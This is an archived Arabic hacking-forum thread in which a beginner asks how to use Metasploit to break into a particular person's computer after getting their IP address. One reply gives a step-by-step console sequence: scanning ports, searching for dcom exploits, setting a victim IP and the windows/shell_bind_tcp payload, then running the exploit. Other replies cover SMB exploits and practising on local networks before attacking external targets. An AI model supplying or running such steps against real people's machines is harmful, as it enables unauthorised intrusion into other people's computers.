المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : المختصين في metasploit الدخول



ابو مهند
05-06-2013, 03:27 AM
بسم الله الرحمن الرحيم
شباب
انا حبيت اتعلم الميتا سبلويت
وسأتعلم انشالله
ولاكن لدي مشكله
تابعت دوره ميتاسبلويت ولاكن الشروحات لا تبدا بالصفر
يعني الوحد يشرحلك اساسيات الميتا فقط
طيب انا اريد ان استفسر عن استهداف شخص معين اريد اختراقه مثلا
لاحظ قلت مثلا
في البدايه حصلت علا الايبي الضحيه المراد اختراقه
وانا هنا اقف لا اعرف مذا افعل

والمطلوبماذا افعل بعد حصولي علا اي ببي الضحيه
يعني اول شي افحص الايبي من البروتات المفتوحه
وبعدين ماذا افعل بعد الفحص
ولكم الشكر
اترك المجال لكم
والسلام خير ختام

موآدع
05-06-2013, 03:37 AM
اول شي افتح بورت 4444
ثم
فحص ايبي الضحية شوف البورتات المفتوحة عندة مثلا حصلنا بورت 445 مفتوح
الان نقوم بعرض الثغرات المتوفرة في الميتا ونشوف ثغرة للبورت 445
ونقوم بعملية ادخال متطلبات الثغرة
ثم الاستغلال
هاذا الكلالم كاساسيات يعني تمشي علية خطوه ورا خطوة شرح بسيط
اليوتوب مليان شروحات طريقة اختيار ثغرة والاستغلال
طبعن في البداية انصحك تتعلم على الختراق المحلي حتى تتعلم ثم الاتقال الى الاختراق الخارجي

ابو مهند
05-06-2013, 03:45 AM
وما الفرق بين الاختراف المحلي ولخارجي

الفاشل العام
05-06-2013, 05:17 AM
السلام عليكم
حبيي الغالي ابو مهند
بعد فحص الاي بي بالـ nmap
ادخل الواجها الرسومية للميتا metasploit console
بعد ماتفتح الميتا اكتب الامر هذا
use auxiliary/scanner/portscan/tcp
بعدها show options
رح يطلع المعلومات
واكتب بعدها set RPORTS 1-500 لحتى يفحص البورتات اللي حددناهم 500 بدل 10000
بعدها set RHOSTS 192.168.1.1 الاي بي تبع الضحية
بعدها show options
وبعدها run
بعدها back
و search dcomحدد الثغرة اللي من نوع great
واكتب use واسم الثغرة تنسخو
بعدها show options
بعدها set RHOST 192.168.1.1 اي بي الضحية
بعدها set PAYLOAD windows/shell_bind_tcp
بعدها show options
بعدها exploit
حالا انت اخترقت السيستم في النظام وتقدر تكون مجلد فيه او ملف
وللاسف لهنا حد معلوماتي في الميتا
بالتوفيق

ابو مهند
05-06-2013, 11:25 AM
نورت الموضوع اخي الفاشل العام
والله تستحق اكثر من الشكر:)

- - - تم التحديث - - -

طيب انا مثلا فحصت اي بي الضحيه وحصلت عنده مفتوح بورت 445 و 135
طيب كل ثغره لها بورت والثغرات مليانه في الميتاسبلويت
كيف اعرف الثغره اي بورت تستخدم
عشان انا لو حصلت مثلا بورت 135
اي ثغره استخدم من الثغرات اللي في الميتا طبعا اكيد لازم الثغره اللي تستخدمها تكون تفتح بورت 135
وانا صعب اني استعرض الثغرات كلها عشان اعرف اذا كانت تستخدم بورت 135

موآدع
05-06-2013, 12:25 PM
وما الفرق بين الاختراف المحلي ولخارجي
الفرق
المحلي تخترق جهاز معك على نفس الشبكة والقصد منة تطبي تعليم اختراق حتى تقن الاختراق ثم تبدا بالخارجي وعني اختراق شخص ما عن طريق الايبي
والمحلي والخارجي نفس الثغرات ونفس التطبيق ونفس الستغلال فقط الختلاف في الايبي

ابو مهند
05-06-2013, 12:35 PM
الفرق
المحلي تخترق جهاز معك على نفس الشبكة والقصد منة تطبي تعليم اختراق حتى تقن الاختراق ثم تبدا بالخارجي وعني اختراق شخص ما عن طريق الايبي
والمحلي والخارجي نفس الثغرات ونفس التطبيق ونفس الستغلال فقط الختلاف في الايبي
بدايتا نورت الموضوع
وانا اشكرك علا اهتمامك لي موضوعي

- - - تم التحديث - - -

لو تقدر تشرحلي هاذي
طيب انا مثلا فحصت اي بي الضحيه وحصلت عنده مفتوح بورت 445 و 135
طيب كل ثغره لها بورت والثغرات مليانه في الميتاسبلويت
كيف اعرف الثغره اي بورت تستخدم
عشان انا لو حصلت مثلا بورت 135
اي ثغره استخدم من الثغرات اللي في الميتا طبعا اكيد لازم الثغره اللي تستخدمها تكون تفتح بورت 135
وانا صعب اني استعرض الثغرات كلها عشان اعرف اذا كانت تستخدم بورت 135

اقرأ المزيد: المختصين في metasploit الدخول

موآدع
05-06-2013, 01:09 PM
بدايتا نورت الموضوع
وانا اشكرك علا اهتمامك لي موضوعي

- - - تم التحديث - - -

لو تقدر تشرحلي هاذي
طيب انا مثلا فحصت اي بي الضحيه وحصلت عنده مفتوح بورت 445 و 135
طيب كل ثغره لها بورت والثغرات مليانه في الميتاسبلويت
كيف اعرف الثغره اي بورت تستخدم
عشان انا لو حصلت مثلا بورت 135
اي ثغره استخدم من الثغرات اللي في الميتا طبعا اكيد لازم الثغره اللي تستخدمها تكون تفتح بورت 135
وانا صعب اني استعرض الثغرات كلها عشان اعرف اذا كانت تستخدم بورت 135

اقرأ المزيد: المختصين في metasploit الدخول

اخي لابد تعرف انواع الثغرات مثل ثغرات smb القويه
اما بنسبة لاظهار الثغرات المتخصص لبورت معين لاعلم بها
هناك ثغرات لها شروط لكي تعمل مثل اصدار الجهاز البرامج المركبة

ابو مهند
05-06-2013, 01:55 PM
مشكووووووووووووووور يا قلبي موادع
هههههههههه
:cool:

- - - تم التحديث - - -

الله يوفق كل من ساعدني /:confused:\

aymen cyril kamar
05-06-2013, 09:02 PM
لا جواب لسؤالك

الفاشل العام
05-06-2013, 11:28 PM
العفو حبيبي الغالي
اما بالنسبة للبورت الي يفتحو الميتا سبلويت بالجهاز 4444
واما البورت اللي يستغلو الثغرة تحدده وتختار بورت مناسب اللي بعرفو .لان انا عند كل محاوله يقولي رح يستخدم البورت الفلاني للوصل للجهاز واغلب البورتات اللي تستخدمها الميتا 135
واذا كانت في طرق اخرى لمعرفة البورت اتمنى يفيدوك الاعظاء
بالتوفيق

ابو مهند
05-07-2013, 03:40 AM
شكرا علا الردود الجميله التي تخرج من اشخاص محترمين لكم كل الشكر والتقدير:)